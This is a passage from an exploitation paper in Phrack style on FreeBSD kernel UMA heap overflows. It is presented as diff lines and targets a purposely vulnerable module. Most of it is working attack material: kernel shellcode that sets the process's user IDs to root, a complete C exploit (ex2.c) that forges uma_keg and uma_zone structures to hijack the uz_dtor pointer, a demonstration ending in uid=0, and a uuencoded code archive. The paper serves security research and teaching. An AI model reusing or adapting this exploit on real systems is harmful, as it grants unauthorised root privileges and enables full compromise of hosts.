+5. We construct a fake uma_keg structure at that memory address.  Our fake
+   uma_keg structure is consisting of sane values to all its elements,
+   however its uk_zones element [2-6] points to another area in our
+   userland buffer.  There we construct a fake uma_zone structure, again
+   with sane values for its elements, but we point the uz_dtor function
+   pointer [2-5] to another address at our userland buffer where we place
+   our kernel shellcode.
+
+6. The next step is to use the system call in order deallocate the last
+   ITEMS_PER_SLAB we have allocated in step 3.  This will lead to free(9),
+   then to uma_zfree_arg() and finally to the execution of the uz_dtor
+   function pointer we have hijacked in step 5.
+
+As a first attempt at exploitation let's focus on diverting execution
+through the uz_dtor function pointer to make the instruction pointer
+execute the instructions at address 0x41424344.  Our first exploit is file
+ex1.c in the code tarball:
+
+[argp@julius ~]$ kldstat | grep bug
+ 4    1 0xc25b6000 2000     bug.ko
+[argp@julius ~]$ gcc ex1.c -o ex1
+[argp@julius ~]$ ./ex1 
+---[ free items on the 256 zone: 4
+---[ consuming 4 items from the 256 zone
+[*] bug: 0: item at 0xc243c200
+[*] bug: 1: item at 0xc2593300
+[*] bug: 2: item at 0xc2381a00
+[*] bug: 3: item at 0xc243b300
+---[ free items on the 256 zone: 30
+---[ allocating 15 evil items on the 256 zone
+---[ userland (fake uma_keg_t) = 0x28202180
+[*] bug: 4: item at 0xc25e7000
+[*] bug: 5: item at 0xc25e6e00
+[*] bug: 6: item at 0xc25e6d00
+[*] bug: 7: item at 0xc25e6c00
+[*] bug: 8: item at 0xc25e6b00
+[*] bug: 9: item at 0xc25e6a00
+[*] bug: 10: item at 0xc25e6900
+[*] bug: 11: item at 0xc25e6800
+[*] bug: 12: item at 0xc25e6700
+[*] bug: 13: item at 0xc25e6600
+[*] bug: 14: item at 0xc25e6500
+[*] bug: 15: item at 0xc25e6400
+[*] bug: 16: item at 0xc25e6300
+[*] bug: 17: item at 0xc25e6200
+[*] bug: 18: item at 0xc25e6100
+---[ deallocating the last 15 items from the 256 zone
+
+Fatal trap 12: page fault while in kernel mode
+cpuid = 0; apic id = 00
+fault virtual address   = 0x41424344
+fault code              = supervisor read, page not present
+instruction pointer     = 0x20:0x41424344
+stack pointer           = 0x28:0xcd074c14
+frame pointer           = 0x28:0xcd074c4c
+code segment            = base 0x0, limit 0xfffff, type 0x1b
+                        = DPL 0, pres 1, def32 1, gran 1
+processor eflags        = interrupt enabled, resume, IOPL = 0
+current process         = 767 (ex1)
+[thread id 767 tid 100050 ]
+Stopped at     0x41424344:      *** error reading from address 41424344 ***
+db> 
+
+// We have successfully diverted execution to the 0x41424344 address.
+// Let's explore the UMA data structures.  First, the edge item of the
+// exploited slab:
+
+db> x/x 0xc25e6e00,4
+0xc25e6e00:     0               0               0               0
+
+// By examining the uma_slab_head structure of the exploited slab we can
+// see that we have overwritten its us_keg element [2-13] with the address
+// of our userland buffer (0x28202180):
+db> x/x 0xc25e6fa8,4
+0xc25e6fa8:     28202180        c2593fa8        c25e7fac        0
+
+// We continue by examining our fake uma_keg structure that us_keg is now
+// pointing to.  The uk_zones element [2-6] of our fake uma_keg structure
+// points further down our userland buffer to the fake uma_zone structure
+// at 0x28202200.
+db> x/x 0x28202180,10
+0x28202180:     c1474880        c1474980        c0b8682c        c0bd82fa
+0x28202190:     1430000         0               4               0
+0x282021a0:     0               0               0               28202200
+0x282021b0:     c32affa0        0               c32b3fa8        0
+
+// We can now verify that the uz_dtor function pointer of the fake uma_zone
+// structure contains 0x41424344 (and that uz_keg [2-1] at 0x28202208
+// points back to our fake uma_keg):
+db> x/x 0x28202200,10
+0x28202200:     c0b867ec        c1474908        28202180        0
+0x28202210:     c147492c        0               0               0
+0x28202220:     41424344        0               0               a32
+0x28202230:     0               8d9             0               0
+
+----[ 4.1 - Kernel shellcode
+
+Since we have verified that we can divert the kernel's execution flow and
+we have a place to store the code we want executed (again, in the userland
+buffer passed as an argument to the vulnerable system call) we will now
+briefly discuss the development of kernel shellcode for FreeBSD.  There is
+no need to go into extensive details on this since previous published work
+on the subject by the "Kernel wars" authors [21] and noir [22] have
+analyzed it sufficiently.  Although noir presented OpenBSD specific kernel
+shellcode, the sysctl(3) technique of leaking the address of the process
+structure from unprivileged userland code is applicable to FreeBSD as
+well.  In our kernel shellcode we use a simpler approach to locate the
+process structure first presented in [21].
+
+We want to create a small shellcode that patches the credentials record
+for the user running the exploit.  To do that we will locate the proc
+struct for the running process, then update the ucred struct that the
+process is associated with.
+
+FreeBSD/i386 uses the segment fs in kernel-context to point to the per-cpu
+variable __pcpu[n] [23].  This structure holds information for the cpu of
+the current context like current thread among other data.  We use this
+segment to quickly get hold of the proc pointer for the currently running
+process and eventually the credentials of the owner user of the process.
+
+To easily figure out the offsets in the structs used by the kernel we get
+some help from gdb, the symbol read is just used to reference addressable
+memory:
+
+$ gdb /boot/kernel/kernel
+...
+(gdb) print /x (int)&((struct thread *)&read)->td_proc-\
+     (int)(struct thread *)&read
+$1 = 0x4
+(gdb) print /x (int)&((struct proc *)&read)->p_ucred-\
+(int)(struct proc *)&read
+$2 = 0x30
+(gdb) print /x (int)&((struct ucred *)&read)->cr_uid-\
+     (int)(struct ucred *)&read
+$3 = 0x4
+(gdb) print /x (int)&((struct ucred *)&read)->cr_ruid-\
+     (int)(struct ucred *)&read
+$4 = 0x8
+
+Knowing the offsets we can now describe our shellcode in detail:
+
+1. Get the curthread pointer by referring to the first word in the struct
+   pcpu [23]:
+        movl    %fs:0, %eax
+
+2. Extract the struct proc pointer for the associated process [24]:
+        movl    0x4(%eax), %eax
+
+3. Get hold of the process owner's identity [25] by getting the struct 
+   ucred for that particular process:
+        movl    0x30(%eax), %eax
+
+4. Patch struct ucred by writing uid=0 on both the effective user ID
+   (cr_uid) and real user ID (cr_ruid) [26]:
+        xorl    %ecx, %ecx
+        movl    %ecx, 0x4(%eax)
+        movl    %ecx, 0x8(%eax)
+
+5. Restore us_keg [2-13] for our overwritten slab metadata, we use the
+   us_keg pointer found in the next uma_slab_head as will be discussed in
+   the next subsection, 4.2:
+        movl    0x1000(%esi), %eax
+        movl    %eax, (%esi)
+        
+6. Return from our shellcode and enjoy uid=0 privileges:
+        ret
+
+----[ 4.2 - Keeping the system stable
+
+After our kernel shellcode has been executed, control is returned to the
+kernel.  Eventually the kernel will try to free an item from the zone that
+uses the slab whose uma_slab_head structure we have corrupted.  However,
+the memory regions we have used to store our fake structures have been
+unmapped when our process has completed.  Therefore, the system crashes
+when it tries to dereference the address of the fake uma_keg structure
+during a free(9) call.
+
+In order to find a way to keep the system stable after returning from the
+execution of our kernel shellcode we fire up our exploit with any kind of
+kernel shellcode, execute it, and we single step in ddb(4) (after we have
+enabled a relevant breakpoint or watchpoint of course) until we reach the
+call of the uz_dtor function pointer:
+
+[thread pid 758 tid 100047 ]
+Stopped at      uma_zfree_arg+0x2d:     calll   *%edx
+
+// Above we can see the call instruction in uma_zfree_arg() where uz_dtor
+// is used.  Let's examine the state of the registers at this point:
+db> show reg
+cs                0x20
+ds                0x28
+es                0x28
+fs                 0x8
+ss                0x28
+eax         0xc25d5e00
+ecx         0xc25d5e00
+edx         0x28202260
+ebx              0x100
+esp         0xcd068c14
+ebp         0xcd068c48
+esi         0xc25d5fa8
+edi         0x28202200
+eip         0xc09e565d  uma_zfree_arg+0x2d
+efl              0x206
+db> x/x $esi
+0xc25d5fa8:     28202180
+
+// Although we have not included the relevant output, we know (see previous
+// executions of ex1.c earlier in the paper) from the execution of our
+// exploit that we have corrupted the 0xc25d5fa8 slab.  We can see that at
+// this point the %esi register holds the address of this slab.  We can
+// also see that the us_keg element ([2-13], first word of uma_slab_head)
+// of uma_slab_head points to our userland buffer (0x28202180).  What we
+// need to do is restore the value of us_keg to point to the correct
+// uma_keg.  Since we know the UMA architecture from section 2, we only
+// need to look for the correct address of uma_keg at the next or the
+// previous slab from the one we have corrupted:
+db> x/x 0xc25d6fa8
+0xc25d6fa8:     c1474900
+
+In order to ensure kernel continuation we can perform an additional check
+by making sure that the next or the previous slab is indeed a valid one and
+its us_keg pointer is not NULL.
+
+Now we know how to dynamically restore at run time from our kernel
+shellcode the value of the corrupted us_keg to contain the address of the
+correct uma_keg structure.
+
+Putting it all together, we have below the complete exploit (file ex2.c in
+the code archive):
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/module.h>
+
+#define EVIL_SIZE           428 /* causes 256 bytes to be allocated */
+#define TARGET_SIZE         256
+#define OP_ALLOC            1
+#define OP_FREE             2
+
+#define BUF_SIZE            256
+#define LINE_SIZE           56
+
+#define ITEMS_PER_SLAB      15  /* for the 256 anonymous zone */
+
+struct argz
+{
+    char *buf;
+    u_int len;
+    int op;
+    u_int slot;
+};
+
+int     get_zfree(char *zname);
+
+u_char kernelcode[] =
+"\x64\xa1\x00\x00\x00\x00"  /* movl %fs:0, %eax */
+"\x8b\x40\x04"              /* movl 0x4(%eax), %eax */
+"\x8b\x40\x30"              /* movl 0x30(%eax), %eax */
+"\x31\xc9"                  /* xorl %ecx, %ecx */
+"\x89\x48\x04"              /* movl %ecx, 0x4(%eax) */
+"\x89\x48\x08"              /* movl %ecx, 0x8(%eax) */
+"\x8b\x86\x00\x10\x00\x00"  /* movl 0x1000(%esi), %eax */
+"\x83\xf8\x00"              /* cmpl $0x0, %eax */
+"\x74\x02"                  /* je   prev */
+"\xeb\x06"                  /* jmp  end */
+                            /* prev: */
+"\x8b\x86\x00\xf0\xff\xff"  /* movl -0x1000(%esi), %eax */
+                            /* end: */
+"\x89\x06"                  /* movl %eax, (%esi) */
+"\xc3";                     /* ret */
+
+int
+main(int argc, char *argv[])
+{
+    int sn, i, j, n;
+    char *ptr;
+    u_long *lptr;
+    struct module_stat mstat;
+    struct argz vargz;
+
+    sn = i = j = n = 0;
+
+    n = get_zfree("256");
+
+    printf("---[ free items on the %d zone: %d\n", TARGET_SIZE, n);
+
+    vargz.len = TARGET_SIZE;
+    vargz.buf = calloc(vargz.len + 1, sizeof(char));
+
+    if(vargz.buf == NULL)
+    {
+        perror("calloc");
+        exit(1);
+    }
+
+    memset(vargz.buf, 0x41, vargz.len);
+
+    mstat.version = sizeof(mstat);
+    modstat(modfind("bug"), &mstat);
+    sn = mstat.data.intval;
+    vargz.op = OP_ALLOC;
+
+    printf("---[ consuming %d items from the %d zone\n", n, TARGET_SIZE);
+
+    for(i = 0; i < n; i++)
+    {
+        vargz.slot = i;
+        syscall(sn, vargz);
+    }
+
+    n = get_zfree("256");
+    printf("---[ free items on the %d zone: %d\n", TARGET_SIZE, n);
+
+    printf("---[ allocating %d evil items on the %d zone\n",
+            ITEMS_PER_SLAB, TARGET_SIZE);
+
+    free(vargz.buf);
+    vargz.len = EVIL_SIZE;
+    vargz.buf = calloc(vargz.len, sizeof(char));
+
+    if(vargz.buf == NULL)
+    {
+        perror("calloc");
+        exit(1);
+    }
+
+    /* build the overflow buffer */
+
+    ptr = (char *)vargz.buf;
+    printf("---[ userland (fake uma_keg_t) = 0x%.8x\n", (u_int)ptr);
+
+    lptr = (u_long *)(vargz.buf + EVIL_SIZE - 4);
+
+    /* overwrite the real uma_slab_head struct */
+    *lptr++ = (u_long)ptr;  /* us_keg */
+
+    /* build the fake uma_keg struct (us_keg) */
+    lptr = (u_long *)vargz.buf;
+    *lptr++ = 0xc1474880;   /* uk_link */
+    *lptr++ = 0xc1474980;   /* uk_link */
+    *lptr++ = 0xc0b8682c;   /* uk_lock */
+    *lptr++ = 0xc0bd82fa;   /* uk_lock */
+    *lptr++ = 0x1430000;    /* uk_lock */
+    *lptr++ = 0x0;          /* uk_lock */
+    *lptr++ = 0x4;          /* uk_lock */
+    *lptr++ = 0x0;          /* uk_lock */
+    *lptr++ = 0x0;          /* uk_hash */
+    *lptr++ = 0x0;          /* uk_hash */
+    *lptr++ = 0x0;          /* uk_hash */
+    
+    ptr = (char *)(vargz.buf + 128);
+    *lptr++ = (u_long)ptr;  /* fake uk_zones */
+
+    *lptr++ = 0xc32affa0;   /* uk_part_slab */
+    *lptr++ = 0x0;          /* uk_free_slab */
+    *lptr++ = 0xc32b3fa8;   /* uk_full_slab */
+    *lptr++ = 0x0;          /* uk_recurse */
+    *lptr++ = 0x3;          /* uk_align */
+    *lptr++ = 0x1a;         /* uk_pages */
+    *lptr++ = 0xd;          /* uk_free */
+    *lptr++ = 0x100;        /* uk_size */
+    *lptr++ = 0x100;        /* uk_rsize */
+    *lptr++ = 0x0;          /* uk_maxpages */
+    *lptr++ = 0x0;          /* uk_init */
+    *lptr++ = 0x0;          /* uk_fini */
+    *lptr++ = 0xc09e3790;   /* uk_allocf */
+    *lptr++ = 0xc09e3750;   /* uk_freef */
+    *lptr++ = 0x0;          /* uk_obj */
+    *lptr++ = 0x0;          /* uk_kva */
+    *lptr++ = 0x0;          /* uk_slabzone */
+    *lptr++ = 0x10fa8;      /* uk_pgoff && uk_ppera */
+    *lptr++ = 0xf;          /* uk_ipers */
+    *lptr++ = 0x10;         /* uk_flags */
+
+    /* build the fake uma_zone struct */
+    *lptr++ = 0xc0b867ec;   /* uz_name */
+    *lptr++ = 0xc1474908;   /* uz_lock */
+
+    ptr = (char *)vargz.buf;
+    *lptr++ = (u_long)ptr;  /* uz_keg */
+
+    *lptr++ = 0x0;          /* uz_link le_next */
+    *lptr++ = 0xc147492c;   /* uz_link le_prev */
+    *lptr++ = 0x0;          /* uz_full_bucket */
+    *lptr++ = 0x0;          /* uz_free_bucket */
+    *lptr++ = 0x0;          /* uz_ctor */
+
+    ptr = (char *)(vargz.buf + 224); /* our kernel shellcode */
+    *lptr++ = (u_long)ptr;  /* uz_dtor */
+
+    *lptr++ = 0x0;          /* uz_init */
+    *lptr++ = 0x0;          /* uz_fini */
+    *lptr++ = 0xa32;
+    *lptr++ = 0x0;
+    *lptr++ = 0x8d9;
+    *lptr++ = 0x0;
+    *lptr++ = 0x0;
+    *lptr++ = 0x0;
+    *lptr++ = 0x200000;
+    *lptr++ = 0xc146b1a4;
+    *lptr++ = 0xc146b000;
+    *lptr++ = 0x39;
+    *lptr++ = 0x0;
+    *lptr++ = 0x3a;
+    *lptr++ = 0x0;          /* end of uma_zone */
+
+    memcpy(ptr, kernelcode, sizeof(kernelcode));
+
+    for(j = 0; j < ITEMS_PER_SLAB; j++, i++)
+    {
+        vargz.slot = i;
+        syscall(sn, vargz);
+    }
+
+    /* free the last allocated items to trigger exploitation */
+    printf("---[ deallocating the last %d items from the %d zone\n",
+            ITEMS_PER_SLAB, TARGET_SIZE);
+
+    vargz.op = OP_FREE;
+
+    for(j = 0; j < ITEMS_PER_SLAB; j++)
+    {
+        vargz.slot = i - j;
+        syscall(sn, vargz);
+    }
+
+    free(vargz.buf);
+    return 0;
+}
+
+int
+get_zfree(char *zname)
+{
+    u_int nsize, nlimit, nused, nfree, nreq, nfail;
+    FILE *fp = NULL;
+    char buf[BUF_SIZE];
+    char iname[LINE_SIZE];
+
+    nsize = nlimit = nused = nfree = nreq = nfail = 0;
+
+    fp = popen("/usr/bin/vmstat -z", "r");
+
+    if(fp == NULL)
+    {
+        perror("popen");
+        exit(1);
+    }
+
+    memset(buf, 0, sizeof(buf));
+    memset(iname, 0, sizeof(iname));
+
+    while(fgets(buf, sizeof(buf) - 1, fp) != NULL)
+    {
+        sscanf(buf, "%s %u, %u, %u, %u, %u, %u\n", iname, &nsize, &nlimit,
+                &nused, &nfree, &nreq, &nfail);
+
+        if(strncmp(iname, zname, strlen(zname)) == 0)
+        {
+            break;
+        }
+    }
+
+    pclose(fp);
+    return nfree;
+}
+
+Let's try it:
+
+[argp@julius ~]$ uname -r
+7.2-RELEASE
+[argp@julius ~]$ kldstat | grep bug
+ 4    1 0xc25b0000 2000     bug.ko
+[argp@julius ~]$ id
+uid=1001(argp) gid=1001(argp) groups=1001(argp)
+[argp@julius ~]$ gcc ex2.c -o ex2
+[argp@julius ~]$ ./ex2
+---[ free items on the 256 zone: 34
+---[ consuming 34 items from the 256 zone
+[*] bug: 0: item at 0xc243c800
+[*] bug: 1: item at 0xc25b3900
+[*] bug: 2: item at 0xc25b2900
+[*] bug: 3: item at 0xc25b2a00
+[*] bug: 4: item at 0xc25b3800
+[*] bug: 5: item at 0xc25b2b00
+[*] bug: 6: item at 0xc25b2300
+[*] bug: 7: item at 0xc25b2600
+[*] bug: 8: item at 0xc2598e00
+[*] bug: 9: item at 0xc25b2200
+[*] bug: 10: item at 0xc25b2000
+[*] bug: 11: item at 0xc2598c00
+[*] bug: 12: item at 0xc25b2100
+[*] bug: 13: item at 0xc25b3000
+[*] bug: 14: item at 0xc25b3b00
+[*] bug: 15: item at 0xc25b2d00
+[*] bug: 16: item at 0xc25b2c00
+[*] bug: 17: item at 0xc25b3600
+[*] bug: 18: item at 0xc243c700
+[*] bug: 19: item at 0xc25b3400
+[*] bug: 20: item at 0xc25b3a00
+[*] bug: 21: item at 0xc25b3700
+[*] bug: 22: item at 0xc243cc00
+[*] bug: 23: item at 0xc243ca00
+[*] bug: 24: item at 0xc25b3500
+[*] bug: 25: item at 0xc2597300
+[*] bug: 26: item at 0xc235d100
+[*] bug: 27: item at 0xc2597100
+[*] bug: 28: item at 0xc2597600
+[*] bug: 29: item at 0xc25b3e00
+[*] bug: 30: item at 0xc25b3c00
+[*] bug: 31: item at 0xc2597500
+[*] bug: 32: item at 0xc2598d00
+[*] bug: 33: item at 0xc25b3100
+---[ free items on the 256 zone: 45
+---[ allocating 15 evil items on the 256 zone
+---[ userland (fake uma_keg_t) = 0x28202180
+[*] bug: 34: item at 0xc25e6800
+[*] bug: 35: item at 0xc25e6700
+[*] bug: 36: item at 0xc25e6600
+[*] bug: 37: item at 0xc25e6500
+[*] bug: 38: item at 0xc25e6400
+[*] bug: 39: item at 0xc25e6300
+[*] bug: 40: item at 0xc25e6200
+[*] bug: 41: item at 0xc25e6100
+[*] bug: 42: item at 0xc25e6000
+[*] bug: 43: item at 0xc25e5e00
+[*] bug: 44: item at 0xc25e5d00
+[*] bug: 45: item at 0xc25e5c00
+[*] bug: 46: item at 0xc25e5b00
+[*] bug: 47: item at 0xc25e5a00
+[*] bug: 48: item at 0xc25e5900
+---[ deallocating the last 15 items from the 256 zone
+[argp@julius ~]$ id
+uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)
+
+--[ 5 - Conclusion
+
+The exploitation technique described in this paper can be applied to
+overflows that take place on memory allocated by the FreeBSD kernel.  The
+main requirement for successful arbitrary code execution, in addition to
+having an overflow bug in the kernel, is that we should be able to make
+repeated allocations of kernel memory from userland without having the
+kernel automatically deallocate our items.  We also need to have control
+over the deallocation of these items to fully control the process.
+Obviously, the uz_dtor overwrite technique we focused on in this paper is
+only one of the alternatives to achieve code execution; the rest are left
+as an exercise for the interested hacker.
+
+argp did the research, developed the exploitation methodology, discovered
+how to keep the system stable after arbitrary code execution and wrote
+this paper.  karl provided the initial challenge, pointed argp to the
+right direction and improved the kernel shellcode subsection (4.1).
+
+argp thanks all the clever signedness.org residents for discussions on
+many very interesting topics (cmn, christer, twiz, mu-b, xz and all the
+others).  Thanks also to brat for always allowing me to break his
+machines, joy and demonmass for generally being cool.
+
+karl thanks christer for starting this whole *bsd exploit epoch, and of
+course cmn for endless discussions on how to solve problems.
+
+--[ 6 - References
+
+[1]  GCC extension for protecting applications from stack-smashing attacks
+     - http://www.trl.ibm.com/projects/security/ssp/
+
+[2]  FreeBSD 8.0-CURRENT: src/sys/kern/stack_protector.c
+     - http://fxr.watson.org/fxr/source/kern/stack_protector.c
+
+[3]  FreeBSD Kernel Developer's Manual - uma(9): zone allocator
+     - http://www.freebsd.org/cgi/
+        man.cgi?query=uma&sektion=9&manpath=FreeBSD+7.2-RELEASE
+
+[4]  FreeBSD Kernel Developer's Manual - malloc(9): kernel memory
+        management routines
+     - http://www.freebsd.org/cgi/
+        man.cgi?query=malloc&sektion=9&manpath=FreeBSD+7.2-RELEASE
+
+[5]  Jeff Bonwick, The slab allocator: An object-caching kernel memory
+        allocator
+     - http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.29.4759
+
+[6]  sgrakkyu and twiz, Attacking the core: kernel exploiting notes
+     - http://phrack.org/issues.html?issue=64&id=6&mode=txt
+
+[7]  struct uma_zone
+     - http://fxr.watson.org/fxr/source/vm/uma_int.h?v=FREEBSD72#L291
+
+[8]  struct uma_bucket
+     - http://fxr.watson.org/fxr/source/vm/uma_int.h?v=FREEBSD72#L166
+
+[9]  struct uma_cache
+     - http://fxr.watson.org/fxr/source/vm/uma_int.h?v=FREEBSD72#L175
+
+[10] struct uma_keg
+     - http://fxr.watson.org/fxr/source/vm/uma_int.h?v=FREEBSD72#L190
+
+[11] struct uma_slab
+     - http://fxr.watson.org/fxr/source/vm/uma_int.h?v=FREEBSD72#L244
+
+[12] struct uma_slab_head
+     - http://fxr.watson.org/fxr/source/vm/uma_int.h?v=FREEBSD72#L230
+
+[13] Non-offpage and offpage slab representations
+     - http://fxr.watson.org/fxr/source/vm/uma_int.h?v=FREEBSD72#L87
+
+[14] FreeBSD Kernel Interfaces Manual - kld(4): dynamic kernel linker
+        facility
+     - http://www.freebsd.org/cgi/
+        man.cgi?query=kld&sektion=4&manpath=FreeBSD+7.2-RELEASE
+
+[15] signedness.org challenge #3 - FreeBSD (6.0) kernel heap overflow
+     - http://www.signedness.org/challenges/
+
+[16] FreeBSD Kernel Interfaces Manual - ddb(4): interactive kernel debugger
+     - http://www.freebsd.org/cgi/
+        man.cgi?query=ddb&sektion=4&manpath=FreeBSD+7.2-RELEASE
+
+[17] void free(void *addr, struct malloc_type *mtp)
+     - http://fxr.watson.org/fxr/source/kern/kern_malloc.c?v=FREEBSD72#L443
+
+[18] void free(void *addr, struct malloc_type *mtp)
+     - http://fxr.watson.org/fxr/source/kern/kern_malloc.c?v=FREEBSD72#L470
+
+[19] void uma_zfree_arg(uma_zone_t zone, void *item, void *udata)
+     - http://fxr.watson.org/fxr/source/vm/uma_core.c?v=FREEBSD72#L2243
+
+[20] void uma_zfree_arg(uma_zone_t zone, void *item, void *udata)
+     - http://fxr.watson.org/fxr/source/vm/uma_core.c?v=FREEBSD72#L2251
+
+[21] Joel Eriksson, Christer Oberg, Claes Nyberg and Karl Janmar, Kernel
+        wars
+     - https://www.blackhat.com/presentations/bh-usa-07/
+        Eriksson_Oberg_Nyberg_and_Jammar/
+        Whitepaper/bh-usa-07-eriksson_oberg_nyberg_and_jammar-WP.pdf
+
+[22] noir, Smashing the kernel stack for fun and profit
+     - http://www.phrack.org/issues.html?issue=60&id=6&mode=txt
+
+[23] void init386(int first)
+     - http://fxr.watson.org/fxr/source/i386/i386/
+        machdep.c?v=FREEBSD72#L2185
+
+[24] struct thread
+     - http://fxr.watson.org/fxr/source/sys/proc.h?v=FREEBSD72#L201
+
+[25] struct proc
+     - http://fxr.watson.org/fxr/source/sys/proc.h?v=FREEBSD72#L489
+
+[26] struct ucred
+     - http://fxr.watson.org/fxr/source/sys/ucred.h?v=FREEBSD72#L38
+
+--[ 7 - Code
+
+begin 644 code.tar.gz
+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
